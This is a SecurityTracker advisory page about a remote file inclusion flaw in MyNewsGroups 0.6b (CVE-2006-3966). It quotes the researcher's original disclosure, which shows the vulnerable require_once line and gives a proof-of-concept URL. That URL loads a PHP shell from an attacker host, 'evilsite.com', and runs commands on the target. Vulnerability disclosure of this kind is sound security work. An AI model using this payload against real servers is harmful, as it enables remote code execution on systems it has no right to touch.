SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (News)  >   MyNewsGroups Vendors:   mynewsgroups.sourceforge.net
MyNewsGroups Include File Flaw in 'myng_root' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016613
SecurityTracker URL:  http://securitytracker.com/id/1016613
CVE Reference:   CVE-2006-3966   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 1 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.6b
Description:   A vulnerability was reported in MyNewsGroups. A remote user can include and execute arbitrary code on the target system.

The '/lib/tree/layersmenue.inc.php' script does not properly validate user-supplied input in the myng_root parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://[evilsite]/PEAR.php/&cmd=ls

Philipp Niedziela discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  mynewsgroups.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability

+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: MyNewsGroups :) v. 0.6b
+ Venedor ...........: http://mynewsgroups.sourceforge.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /lib/tree/layersmenue.inc.php:
+
+ .....
+ <?php
+ // PHP Layers Menu 2.3.5 (C) 2001-2003 Marco Pratesi (marco at telug dot
it)
+
+ require_once $myng_root."/pear/PEAR.php";
+ .....
+
+--------------------------------------------------------------------
+
+ $myng_root is not properly sanitized before being used.
+ The bug is in the "PHP Layers Menu 2.3.5" Package for MyNewsGroups.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $myng_root ="bla/bla" //Your root path
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/pear/PEAR.php/index.html
+
+
http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.com/P
EAR.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini&Lenni
+
+-------------------------[ E O F ]----------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC